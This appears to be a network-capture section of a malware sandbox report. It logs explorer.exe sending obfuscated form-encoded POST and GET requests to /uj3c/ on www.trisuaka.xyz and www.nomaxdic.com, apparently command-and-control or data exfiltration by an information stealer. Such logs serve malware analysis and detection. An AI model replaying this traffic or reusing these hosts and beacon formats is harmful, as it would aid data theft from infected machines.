                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://www.trisuaka.xyz/uj3c/
                                                                                                Accept-Language: en-US
                                                                                                Accept-Encoding: gzip, deflate
                                                                                                Data Raw: 72 34 53 30 50 3d 75 46 58 50 6c 70 76 6c 41 59 36 6e 34 46 6e 4d 51 32 63 47 63 43 41 35 37 69 73 39 4d 42 72 63 35 6c 42 68 4f 4a 41 31 44 39 30 30 70 66 47 2d 43 68 70 64 61 5f 39 69 4b 56 62 71 4f 76 34 4c 70 38 34 70 4e 30 45 76 59 7a 46 31 66 78 56 4d 63 50 33 66 57 6b 63 33 32 43 7a 32 32 6e 63 79 44 34 77 4c 52 44 44 37 61 5f 78 78 72 68 4d 43 35 64 61 71 79 34 72 79 47 65 6f 41 49 44 46 2d 55 38 64 61 73 63 77 63 6f 76 62 66 53 58 78 2d 28 55 4e 76 4d 4a 4e 54 73 74 56 45 45 6a 74 4c 78 6a 53 7a 64 6b 47 6c 71 2d 31 44 28 33 33 38 66 64 57 56 47 31 32 30 44 77 6e 72 70 6a 4f 50 76 78 52 45 6e 59 6e 70 65 54 6b 39 4e 31 66 63 61 72 4e 5f 70 5a 47 53 64 6c 33 55 4d 66 6b 78 62 68 75 51 35 43 43 64 65 48 51 31 7a 45 53 36 49 64 50 4d 43 71 69 30 7a 47 6b 6c 58 62 46 4a 4d 57 37 50 38 57 45 56 42 6b 5a 53 6f 43 72 6e 4a 32 61 6f 73 75 75 64 36 48 6e 46 34 77 6b 68 63 37 77 33 4f 38 68 39 63 77 53 53 66 77 73 5a 65 6e 63 48 31 7a 68 39 6a 68 62 4e 45 53 47 52 52 6a 45 62 75 52 4f 4c 33 51 39 74 65 49 68 46 38 79 31 73 78 68 43 68 44 6a 51 55 73 32 35 48 44 31 6a 55 65 6b 6c 52 4c 67 62 5f 37 56 5a 71 7a 49 42 73 50 39 5a 30 77 61 34 38 31 6a 68 71 56 79 32 58 42 69 54 4c 6e 4d 47 52 28 65 58 37 38 31 4f 5f 4d 63 44 44 63 66 6c 53 6a 56 6b 67 56 72 7a 56 67 4a 51 53 4b 64 76 34 37 51 77 65 73 53 38 4d 47 73 28 39 48 4e 64 4c 4b 6c 73 48 58 37 4e 54 6e 30 49 4e 37 6b 52 74 71 35 50 32 61 71 45 33 46 72 52 61 78 58 36 7a 47 52 31 30 61 47 36 44 33 5a 41 4f 4e 74 57 74 72 5f 70 43 35 48 57 32 6a 4c 54 53 73 44 66 65 47 5a 41 37 49 6a 30 67 68 53 31 78 6c 33 7a 4e 73 39 65 4c 57 59 6a 77 6b 47 46 33 70 35 67 66 56 4a 69 74 66 36 6a 7a 66 4b 50 6c 70 4d 57 48 31 4b 66 46 70 50 50 73 32 31 41 59 47 41 4f 73 4a 34 6d 58 33 6b 48 51 69 6a 74 41 45 70 53 4f 4c 71 75 69 64 35 56 31 41 62 4e 68 58 53 6e 5f 32 68 39 49 47 51 39 75 46 41 44 39 38 71 4b 70 79 62 5a 4e 30 35 4a 59 4e 31 38 4f 4b 61 4a 68 35 74 45 6e 44 35 6d 57 44 6c 49 66 79 58 33 57 71 41 44 52 43 76 67 6f 41 55 73 69 6e 6a 4f 31 4c 43 75 55 53 5a 65 77 6e 48 44 6c 6e 75 4c 74 32 4f 4c 39 47 30 6e 63 58 42 67 5f 57 34 66 33 76 39 45 34 69 33 57 62 65 59 55 64 50 6c 48 53 6e 72 6c 72 34 4e 45 47 76 4d 44 5f 53 69 5a 79 71 75 62 5f 61 6f 49 74 4b 56 6d 76 5a 65 78 74 6e 42 38 61 6a 30 6c 64 52 38 36 48 42 6a 39 48 6e 38 4b 59 42 2d 4c 77 65 78 79 68 32 50 32 58 6e 52 35 61 66 64 55 4b 33 41 64 50 72 2d 4e 74 7e 67 54 30 4d 30 79 68 48 6e 71 4b 4f 67 74 62 68 76 48 42 4b 4e 5a 77 63 47 78 2d 4f 71 4f 6e 72 35 58 6b 48 34 45 35 4b 51 59 4d 36 2d 7e 5f 52 79 35 54 74 6f 74 6e 6d 71 6c 45 51 67 34 4a 51 6b 5a 68 45 4b 53 75 59 4a 5a 4a 41 6a 63 55 45 61 36 51 4a 30 76 76 47 6a 65 6b 68 64 75 42 73 78 45 59 4c 64 4b 46 49 37 78 46 52 59 71 42 62 7a 57 30 6e 4e 59 6e 76 57 35 77 37 64 52 33 59 53 47 47 57 5f 6c 6f 30 61 4f 33 66 41 35 74 39 50 4f 66 4f 2d 30 6a 69 77 38 50 6f 58 4c 33 46 66 58 62 56 32 69 31 70 70 65 49 6a 41 63 47 5a 34 34 62 4b 35 51 70 68 6d 62 6b 77 37 4d 52 45 37 65 67 35 70 44 68 77 53 44 33 4f 4f 64 51 41 70 4c 49 62 69 4a 31 7e 43 4f 4a 6a 79 50 4c 6f 70 56 48 73 77 37 59 32 46 54 62 54 34 6d 69 52 71 50 2d 33 6c 57 33 76 6e 38 32 46 43 36 33 75 67 35 6a 73 65 34 68 59 4a 72 54 32 38 4b 73 45 77 50 72 66 6d 38 6c 54 38 70 32 77 62 76 6e 61 6e 71 41 69 61 62 41 4b 54 57 43 38 54 47 64 66 77 28 7a 35 34 6f 37 4d 5f 30 37 78 37 75 75 6f 70 37 51 39 6d 63 53 66 4a 77 73 61 39 69 6e 47 6d 63 5f 6c 35 65 73 31 65 6d 67 50 37 68 52 65 6f 5a 42 77 65 65 36 42 54 7a 44 66 5f 33 45 51 66 71 4a 6e 7a 65 68 78 61 43 43 30 74 69 6b 6f 77 44 79 38 35 61 35 53 79 6c 64 49 6c 55 78 78 61 28 43 6a 5a 42 52 6c 67 61 35 6c 48 51 48 56 39 55 72 4c 62 36 33 65 59 6d 33 67 4d 28 48 43 41 58 79 72 4c 43 4f 7a 57 36 62 61 61 50 45 57 30 71 2d 59 4e 6c 42 53 54 6c 35 62 72 55 4c 6f 5f 77 63 32 46 52 49 57 52 62 75 52 53 35 6c 46 56 30 39 74 71 75 6b 50 78 6a 65 62 36 41 66 4e 4d 72 64 4c 44 54 62 69 5f 6f 56 6a 35 39 38 72 67 6f 6b 70 6a 52 56 74 55 58 79 71 61 4b 67 49 6a 76 54 69 66 52 6c 5a 37 35 43 72 52 79 35 70 38 58 5a 51 76 47 4d 33 35 6d 41 32 64 47 51 38
                                                                                                Data Ascii: r4S0P=uFXPlpvlAY6n4FnMQ2cGcCA57is9MBrc5lBhOJA1D900pfG-Chpda_9iKVbqOv4Lp84pN0EvYzF1fxVMcP3fWkc32Cz22ncyD4wLRDD7a_xxrhMC5daqy4ryGeoAIDF-U8dascwcovbfSXx-(UNvMJNTstVEEjtLxjSzdkGlq-1D(338fdWVG120DwnrpjOPvxREnYnpeTk9N1fcarN_pZGSdl3UMfkxbhuQ5CCdeHQ1zES6IdPMCqi0zGklXbFJMW7P8WEVBkZSoCrnJ2aosuud6HnF4wkhc7w3O8h9cwSSfwsZencH1zh9jhbNESGRRjEbuROL3Q9teIhF8y1sxhChDjQUs25HD1jUeklRLgb_7VZqzIBsP9Z0wa481jhqVy2XBiTLnMGR(eX781O_McDDcflSjVkgVrzVgJQSKdv47QwesS8MGs(9HNdLKlsHX7NTn0IN7kRtq5P2aqE3FrRaxX6zGR10aG6D3ZAONtWtr_pC5HW2jLTSsDfeGZA7Ij0ghS1xl3zNs9eLWYjwkGF3p5gfVJitf6jzfKPlpMWH1KfFpPPs21AYGAOsJ4mX3kHQijtAEpSOLquid5V1AbNhXSn_2h9IGQ9uFAD98qKpybZN05JYN18OKaJh5tEnD5mWDlIfyX3WqADRCvgoAUsinjO1LCuUSZewnHDlnuLt2OL9G0ncXBg_W4f3v9E4i3WbeYUdPlHSnrlr4NEGvMD_SiZyqub_aoItKVmvZextnB8aj0ldR86HBj9Hn8KYB-Lwexyh2P2XnR5afdUK3AdPr-Nt~gT0M0yhHnqKOgtbhvHBKNZwcGx-OqOnr5XkH4E5KQYM6-~_Ry5TtotnmqlEQg4JQkZhEKSuYJZJAjcUEa6QJ0vvGjekhduBsxEYLdKFI7xFRYqBbzW0nNYnvW5w7dR3YSGGW_lo0aO3fA5t9POfO-0jiw8PoXL3FfXbV2i1ppeIjAcGZ44bK5Qphmbkw7MRE7eg5pDhwSD3OOdQApLIbiJ1~COJjyPLopVHsw7Y2FTbT4miRqP-3lW3vn82FC63ug5jse4hYJrT28KsEwPrfm8lT8p2wbvnanqAiabAKTWC8TGdfw(z54o7M_07x7uuop7Q9mcSfJwsa9inGmc_l5es1emgP7hReoZBwee6BTzDf_3EQfqJnzehxaCC0tikowDy85a5SyldIlUxxa(CjZBRlga5lHQHV9UrLb63eYm3gM(HCAXyrLCOzW6baaPEW0q-YNlBSTl5brULo_wc2FRIWRbuRS5lFV09tqukPxjeb6AfNMrdLDTbi_oVj598rgokpjRVtUXyqaKgIjvTifRlZ75CrRy5p8XZQvGM35mA2dGQ88m0W88e~fVbtUI1z-Ao~-Gg0j2nW6zy3QMilVxk7itl9y5e2lTDsf4m8SHipV3ih8axhRCNIANXNImbSTCabMlNBD2gkBoiO21fR12iztlNZE6KAX~VYYEc6y(nTXDHtKj63nKqGZBf3JYoWoISqJEWci5yqH7t9TB1EJMo8tSPCu0zM71XfulJclcHre494zonq-t8hRg7GP29Hjj6nHfiHoIleqcDkwtC36BYID2Apcvft-pDGyFjObueQOcVNnPmH5NeZhe2VrlRUlnswzJ3rh45JfuWHo(DKGX-33nYsvW5Z2tzbrxk3mdoDEQNViqN1H~34jmJS70L5TWvS2jJFgg-Ve0qGlfYq0B9ijf_cAIyUkYJSlWazENn8rOkHptfh7H3y1bvTMtI(ywrw4bzM8g30QSZolOjETJHiU0q0DrntTISkzbkSexDAgedsKB_c2Nyb4~3CFf3fHblGlwY1m7bBa7WUT5k1NZCnQ86~tcDY6XTfAw3v8GQ8xjrLiz9XaycpNhoh0OKK5YKG1UXGD4ROUnTo8(czZkQvYwB9b0Emf9aHct1XjAOJGkpDiQTbV89kScU64K0xrxFy5MTdNiLmkkOAci7cls5qXl35HpOrXia1_p1e-Czs1GAUKGqQvxmq0HnfpkeN1DfU5k6TVWJTwGzniu6did44FSoL2lStXDY8x3KgyX_limSp2sfjc3Imno4ExBdae98UQETjigWxumGACPbzniKiomzeZ2RNAHFhGNuxdxI3NMqdjWgEw4KM2vdTbEYIUMA59v_~pqVQpgLyqpce6tiP8Lgah8O2soI7ml7lPWTFPCatlx_i3J86sgIz5Bi(s9okDt-Agw4gS(YbWe_h35c(_h2OouXQFJPyi~YItu_Fn0qvp8sGBPeksMEkyJrNwT9kI37IVOOZ294BNFZTzYQVqzS~5F9VVIIhV6dyQ3dcEWZyoaCZ0j2D7WTkd8Mc6YWPYaAqVRjXqwo3nHIJ9ajKrsemyPlqcrNQ6fGBt~oRGOZ6qkAh3moCP1Ty-n5epcLfOv9r8W_FB(QwoetKxZLJZysqnLUZViWBy(l5OEM8M8jMpxdfk8JsOc6D_BqnLLCwi~2xGCcgNcz(9eZ1arWMbj8VAkbqGy4cAFM6qCBM7Gse12I55rktYF8IIoMPkjZT4bQB2epbWZVvRQYRwgbCxemYdZ_Hrv1wI57EJsoX7c6qGGQRTgZmdUofFoMFMuJheh6oOlcb1zOCqkdyZfQg5DpGgucIq6qDL3bTdbhCacYIVaWjrRw5pnZRLscfj2167I5e1f_wQleQFk2uDbLPbxbJQDETCUKsUT_(vnIXLDX6vIoz6JaAIdZ5vOtV95sx0y161FglrqrDwXyk5Qhi50rcEq1ALUqZeh9zH2Yy_YgmI8ZxcTiaj~XmEEuDXCsRcIl8m7D9gN3FcdZamz-em7XH5ngLpWBnZRAOxt2u45p1QW642jUg7X27tALOJpBSU9j14q6LEcFTmpWD2ZBdbsLikB3Y8magYgwbi3VmTxX0FjLpvZlIU4nJzXJ9omqt58yQ8W6x7d7p1Z3SLOdzKUd6upk1ZKMTENvqwz2At5k5d5kITQQawT_krSc(wKpvKtus_XPD18dbBeWES1KxS8cSk~kKKEyXxMw15(umsiVGRUM39a7HWczWtL2wbm6aTHDo-vn0JuJzqk7W5aBDigz7XdEez2Xd_pgy_cb89bBPhPj(7jTMPFdFIDXvJeen6p4iAkfxkVv5AxL~dz38twi79eJnZ73bJ0YTnOw8jkCucbMT-Q0wcsD7gYOCqUmWshoSPuFpLlaHHVbx8VYtni-HShBtpZ252xnImj05T81n29Guov8Tt70VPBxMns2PjHdsTTt4f(v53RbFZK_5fsBlRe_5a2plLPBTB3qoN1zQWY6pJJ-AntmcKW9p0bHW-(vPkqPp_(ZWRry9NVUlsQ1DuCM65Yac2b-8M4tWZh99HLoQsljYXAXtpSdGm3wlNvGIFGOxdvHwhZGam1wMgYnq_iuxCRP9JID6O2zRrc4Zto2(-K5DRt57x0tPRzfO6jvtyY5b5c2He5DrddMIsWHM8TXq8vkN7mVU3AwaqW6cYsK2SJlImCqT5z1sQ~kz2vP1TgNff~pWvzYfhCvWK6c1iVsosePVfagNTOd6tG1G_gSAa9dLGjfim9gn5cOWf~vHzjKFXu4XTBE6SrsXx~CpSyYtUgnVwSPn6(0vJOaM1TrO4QESE50S0YxFc5V~JnDsccpIkENx1a2CDE3hXUq3CXC3PokCzwMrLnnd0HhAe7GEmJ2GqLoLkw93AxrA2EGS-WQ4zQvv0ICCxYqZowXb8k0Q78PFQ6tYBIROY~mHTKADaSTVChnX6xak4~gaEdP(O7-lXiYztVRZ3BAhMqQe9wc(jfUKTTtgInnOPWSW12doSEb0g8pZLVSsESew3fihaYnmXc4VBs5hSO3mbjXuI(m1vLH3ZSQMLArT74t8aiIq7tkCdPy2EnLWgByg42kRrO5l_aLgOQJsYlCJCw-htQzeyROJlQfsFP52rQY7Lf4OhomA3OayesfHe5KEGDV4SxzyoapN435nDxbEglpxzAHUvOx1xMKCJhcbOfwdxFWLo0cCRIfO9aVMNHxBO3KA2PgiM5_XZwqU932(dJu(3PKmn0BO_sANQsc4q(mHRLOQJiwCkN3AF6_oLI4hpiO~H8cEeVAdwT_
                                                                                                Aug 8, 2022 20:15:34.612741947 CEST10144INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 08 Aug 2022 18:15:34 GMT
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Mon, 08 Aug 2022 19:15:34 GMT
                                                                                                Location: https://www.trisuaka.xyz/uj3c/
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WbuXodLAioqthRl4ygjUnLRL7D3kei2Prn53sKFcoWFCEV0WvXKnC96SlQLKyOqFz75anLMWiBcXP5yq8HFEVbCIjVRSJu%2FS4SzuFeeQMMIkmTbdTDJdctm3LB14lcZtPGoJ"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Vary: Accept-Encoding
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 737a3cf92bbc9040-FRA
                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                16192.168.2.349858188.114.97.380C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:15:34.595506907 CEST10142OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1
                                                                                                Host: www.trisuaka.xyz
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:15:34.628506899 CEST10145INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 08 Aug 2022 18:15:34 GMT
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Mon, 08 Aug 2022 19:15:34 GMT
                                                                                                Location: https://www.trisuaka.xyz/uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=92KWEFhBSRwmsypwogEsRGtYR2gRw749njRIjBDsGdPBDWDeaD3V0816lyOTlBBw4FmjMChsK%2FkYtyhrKrYAfbCkmnCjrFUtbGGI7oRkq51FXTIGb8jjg%2BT8V%2BLxgX%2B6x%2BId"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 737a3cf93dff9b9a-FRA
                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                17192.168.2.34985938.54.163.5780C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:15:40.151515961 CEST10146OUTPOST /uj3c/ HTTP/1.1
                                                                                                Host: www.nomaxdic.com
                                                                                                Connection: close
                                                                                                Content-Length: 411
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.nomaxdic.com
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://www.nomaxdic.com/uj3c/
                                                                                                Accept-Language: en-US
                                                                                                Accept-Encoding: gzip, deflate
                                                                                                Data Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4a 62 38 4a 4b 53 6d 76 30 4a 45 72 42 64 57 36 54 30 64 75 5a 46 55 50 30 45 57 6d 41 39 4d 55 65 37 49 56 67 7a 5f 59 65 53 6e 6f 70 74 53 77 6b 73 6e 44 49 37 4b 65 66 77 77 6b 5a 4a 36 77 67 66 49 6e 65 43 68 7a 58 70 75 77 6d 31 59 75 71 51 41 69 63 73 76 62 55 50 72 61 52 4c 37 47 58 6e 50 7a 6f 54 43 43 45 52 59 31 4e 33 53 31 67 77 41 53 48 41 36 4b 75 76 6a 33 73 68 38 71 48 39 6f 45 4e 48 48 77 56 57 79 69 44 69 48 39 69 76 32 57 78 57 52 6a 47 76 6a 44 6c 6a 4c 34 6a 4a 4d 43 4c 57 45 74 69 6a 69 4c 44 47 46 66 4a 67 68 54 5f 7a 4a 7a 71 69 76 65 7a 33 33 4c 55 47 72 77 34 39 53 74 69 74 2d 36 4a 53 4b 68 56 37 54 6b 59 61 43 33 73 62 4e 76 53 4e 49 66 4f 44 33 55 76 76 35 74 49 45 6e 51 31 53 75 53 56 71 37 7a 72 64 63 75 4d 6d 4c 79 32 5a 32 69 34 6f 54 70 67 48 6d 46 67 33 59 58 6c 45 58 61 2d 33 57 30 67 70 39 6d 33 34 34 28 67 4b 42 78 6d 49 5a 4e 58 37 51 6e 32 34 6c 79 39 5a 71 45 53 4e 75 71 54 6a 37 69 71 48 73 4e 5f 55 34 69 43 5a 6c 4c 65 61 74 53 39 38 2d 28 50 6e 68 4d 45 53 78 52 79 51 6e 6e 35 68 79 55 58 4e 75 63 30 7e 51 51 53 4e 52 6a 74 6f 36 76 52 67 6a 46 51 48 44 6c 70 35 74 61 68 48 44 30 6c 63 6a 69 58 79 37 52 4c 45 36 55 61 75 72 55 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: r4S0P=vFqnDJb8JKSmv0JErBdW6T0duZFUP0EWmA9MUe7IVgz_YeSnoptSwksnDI7KefwwkZJ6wgfIneChzXpuwm1YuqQAicsvbUPraRL7GXnPzoTCCERY1N3S1gwASHA6Kuvj3sh8qH9oENHHwVWyiDiH9iv2WxWRjGvjDljL4jJMCLWEtijiLDGFfJghT_zJzqivez33LUGrw49Stit-6JSKhV7TkYaC3sbNvSNIfOD3Uvv5tIEnQ1SuSVq7zrdcuMmLy2Z2i4oTpgHmFg3YXlEXa-3W0gp9m344(gKBxmIZNX7Qn24ly9ZqESNuqTj7iqHsN_U4iCZlLeatS98-(PnhMESxRyQnn5hyUXNuc0~QQSNRjto6vRgjFQHDlp5tahHD0lcjiXy7RLE6UaurUQ).


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                18192.168.2.34986038.54.163.5780C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:15:40.343843937 CEST10155OUTPOST /uj3c/ HTTP/1.1
                                                                                                Host: www.nomaxdic.com
                                                                                                Connection: close
                                                                                                Content-Length: 36479
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.nomaxdic.com
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://www.nomaxdic.com/uj3c/
                                                                                                Accept-Language: en-US
                                                                                                Accept-Encoding: gzip, deflate
                                                                                                Data Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4d 6a 75 4e 36 7e 7a 71 6b 46 76 70 30 51 56 69 54 6b 66 76 6f 78 4c 44 57 41 4a 78 42 4e 69 4c 4c 28 66 55 6c 48 68 50 65 50 6f 73 75 68 77 77 6d 30 65 4f 64 54 4f 61 2d 4d 5f 6b 5a 78 41 77 67 54 49 67 65 72 2d 77 30 52 51 77 44 68 62 6f 4b 51 53 77 4d 73 6d 52 77 50 57 61 52 66 6a 47 58 75 43 7a 59 76 43 44 6d 5a 59 68 2d 76 62 74 67 77 5a 52 44 6b 32 56 2d 6a 2d 33 73 70 65 71 46 70 6f 44 39 62 48 78 77 65 7a 67 45 32 45 37 79 76 7a 54 78 58 42 74 6d 6a 33 44 6c 58 6c 34 69 6c 4d 46 35 69 45 74 7a 44 69 61 51 65 45 4c 70 67 6b 42 50 7a 2d 33 71 65 36 65 7a 72 7a 4c 51 28 51 7a 4e 56 53 76 53 74 5f 7e 61 44 33 32 53 62 45 33 59 75 6c 33 70 43 70 76 6e 74 51 66 4d 58 50 58 63 6e 4a 69 4b 73 42 51 7a 4b 45 43 46 71 5f 34 4c 64 39 75 4d 6d 72 79 32 5a 63 69 34 34 54 70 6a 6e 6d 46 46 37 59 42 58 38 51 44 2d 33 54 39 41 6f 36 69 33 31 44 28 67 69 72 78 6a 39 43 4d 67 44 51 68 6a 63 6c 33 38 5a 74 49 79 4e 73 6b 7a 6a 69 35 36 48 76 4e 5f 55 61 69 44 5a 31 4d 74 65 74 41 59 49 2d 34 74 28 68 4f 30 53 78 49 43 51 6c 73 5a 74 69 55 58 46 51 63 78 43 6d 51 6c 56 52 69 2d 67 36 68 51 67 6a 45 41 48 44 74 4a 34 73 4c 30 36 75 7a 56 49 4e 77 31 7e 32 62 38 64 33 5a 5a 75 67 44 4e 72 6a 6a 33 36 6b 59 37 39 78 61 41 39 5f 69 69 28 7a 58 30 67 71 52 42 57 57 28 68 55 68 31 48 39 55 55 73 41 5a 48 71 72 52 61 63 6f 32 7a 46 52 4a 70 37 51 79 4a 43 58 55 53 63 5a 45 35 4a 68 66 62 65 78 67 46 52 5a 32 43 7a 78 73 73 39 71 5f 68 71 76 50 72 63 31 77 44 43 53 55 37 6d 47 48 57 79 78 6b 78 42 7a 73 56 63 52 65 36 71 65 6f 54 62 7e 64 70 39 63 48 58 41 48 32 28 49 7e 4d 31 46 7a 48 69 74 48 58 49 6f 36 6f 51 65 54 38 6b 47 79 65 62 6b 4e 63 63 74 70 56 6c 4c 65 45 6f 74 53 78 39 55 68 6c 33 30 32 77 75 30 6c 34 6e 37 63 6d 59 67 42 51 72 36 73 4d 7a 77 37 4a 6b 67 32 59 42 43 7a 7a 67 68 5a 50 47 6a 75 55 6d 42 6a 35 52 6d 30 42 72 33 51 4d 55 61 6e 4b 71 54 76 59 76 55 64 49 73 4d 45 74 56 43 65 2d 6b 42 58 54 65 44 4b 64 44 66 74 62 78 63 64 66 68 36 45 68 54 6d 6e 51 34 65 71 49 63 6b 78 4d 38 30 51 62 77 45 4f 66 38 67 34 73 53 50 4f 52 39 62 51 44 78 33 61 38 73 7a 54 30 69 73 70 4f 31 4a 30 65 5a 70 43 56 58 37 36 49 4e 52 69 34 46 30 77 76 67 6b 36 30 6f 48 51 5a 45 62 6b 50 57 58 71 6d 32 62 50 50 54 32 49 41 6c 53 77 61 67 68 76 39 4f 48 6d 53 79 6b 59 7a 51 69 4f 74 4a 67 6f 6a 73 5f 6d 6d 57 6c 4c 71 6c 61 79 53 7e 47 64 76 71 52 59 78 75 4f 56 79 47 75 47 52 79 69 35 6c 68 6f 77 64 68 62 65 36 41 65 57 6e 56 73 66 63 77 50 35 46 6e 61 4d 4f 30 6d 28 5f 6c 5f 52 54 63 67 6e 79 4d 31 47 4d 55 7a 77 76 38 52 50 35 31 4c 71 51 66 35 45 47 74 62 6b 71 48 4f 63 6b 51 4b 44 65 77 5a 67 44 78 73 4d 5f 44 71 72 41 49 2d 4a 4f 65 6f 49 63 6e 37 57 46 61 49 67 76 42 59 51 46 68 55 34 41 68 48 7e 44 65 68 7e 58 49 51 6b 43 68 5f 34 59 74 36 4e 39 59 4d 78 68 61 34 36 63 6d 46 36 6e 65 76 79 51 4a 69 37 4e 73 2d 61 74 4c 52 54 7a 42 5f 42 44 57 38 73 62 6f 71 52 59 4f 4e 75 64 4e 62 4c 70 73 47 34 41 49 4b 35 68 4f 58 57 45 51 77 65 66 4e 65 58 5f 59 70 47 66 6e 6a 70 6a 35 73 58 55 5a 2d 46 79 51 6e 37 42 68 4f 57 44 6d 53 36 4d 75 58 68 52 58 6c 58 52 62 53 66 4c 65 41 41 4a 44 6e 49 48 52 78 69 5f 78 33 45 79 58 55 67 2d 58 6e 68 6d 4a 32 43 69 6d 43 6f 57 35 51 56 4d 44 4d 57 65 4c 70 57 6c 58 34 74 56 54 4d 59 38 66 68 65 35 53 6f 28 42 47 58 69 55 38 31 71 64 5a 54 6e 43 77 48 65 64 6f 2d 30 6f 78 58 41 2d 4a 7a 6d 73 51 47 59 4e 56 78 48 58 51 75 6d 42 78 58 55 74 66 56 45 44 30 7a 33 31 6c 75 74 59 62 4e 66 78 75 6b 77 67 38 73 42 41 7e 4a 64 32 33 51 67 59 67 47 76 53 64 39 36 6f 52 57 6f 69 67 55 42 77 47 52 79 30 30 71 36 2d 52 33 64 6e 43 38 41 6c 4a 48 6c 54 5a 64 75 6d 67 70 55 77 5a 6e 5a 6d 61 4c 68 36 44 66 4b 55 57 6a 54 64 71 43 58 59 48 6b 7e 76 4a 4f 56 74 74 4d 66 50 44 6d 4f 6e 6c 58 61 46 4d 51 58 78 51 54 78 63 6e 37 54 36 32 4d 51 35 61 61 77 34 65 77 6e 52 6b 39 6c 72 63 73 6c 57 51 65 79 39 37 33 4d 79 6b 78 28 6c 76 64 73 68 74 47 76 70 49 38 63 41 4d 35 56 74 76 71 76 64 47 61 4a 68 6a 79 32 43 31 52 45 52 6e 51 45 77 66 77 4a 51 73 39 68 58 28 6e 56 59 50 58 43 6f 70
                                                                                                Data Ascii: r4S0P=vFqnDMjuN6~zqkFvp0QViTkfvoxLDWAJxBNiLL(fUlHhPePosuhwwm0eOdTOa-M_kZxAwgTIger-w0RQwDhboKQSwMsmRwPWaRfjGXuCzYvCDmZYh-vbtgwZRDk2V-j-3speqFpoD9bHxwezgE2E7yvzTxXBtmj3DlXl4ilMF5iEtzDiaQeELpgkBPz-3qe6ezrzLQ(QzNVSvSt_~aD32SbE3Yul3pCpvntQfMXPXcnJiKsBQzKECFq_4Ld9uMmry2Zci44TpjnmFF7YBX8QD-3T9Ao6i31D(girxj9CMgDQhjcl38ZtIyNskzji56HvN_UaiDZ1MtetAYI-4t(hO0SxICQlsZtiUXFQcxCmQlVRi-g6hQgjEAHDtJ4sL06uzVINw1~2b8d3ZZugDNrjj36kY79xaA9_ii(zX0gqRBWW(hUh1H9UUsAZHqrRaco2zFRJp7QyJCXUScZE5JhfbexgFRZ2Czxss9q_hqvPrc1wDCSU7mGHWyxkxBzsVcRe6qeoTb~dp9cHXAH2(I~M1FzHitHXIo6oQeT8kGyebkNcctpVlLeEotSx9Uhl302wu0l4n7cmYgBQr6sMzw7Jkg2YBCzzghZPGjuUmBj5Rm0Br3QMUanKqTvYvUdIsMEtVCe-kBXTeDKdDftbxcdfh6EhTmnQ4eqIckxM80QbwEOf8g4sSPOR9bQDx3a8szT0ispO1J0eZpCVX76INRi4F0wvgk60oHQZEbkPWXqm2bPPT2IAlSwaghv9OHmSykYzQiOtJgojs_mmWlLqlayS~GdvqRYxuOVyGuGRyi5lhowdhbe6AeWnVsfcwP5FnaMO0m(_l_RTcgnyM1GMUzwv8RP51LqQf5EGtbkqHOckQKDewZgDxsM_DqrAI-JOeoIcn7WFaIgvBYQFhU4AhH~Deh~XIQkCh_4Yt6N9YMxha46cmF6nevyQJi7Ns-atLRTzB_BDW8sboqRYONudNbLpsG4AIK5hOXWEQwefNeX_YpGfnjpj5sXUZ-FyQn7BhOWDmS6MuXhRXlXRbSfLeAAJDnIHRxi_x3EyXUg-XnhmJ2CimCoW5QVMDMWeLpWlX4tVTMY8fhe5So(BGXiU81qdZTnCwHedo-0oxXA-JzmsQGYNVxHXQumBxXUtfVED0z31lutYbNfxukwg8sBA~Jd23QgYgGvSd96oRWoig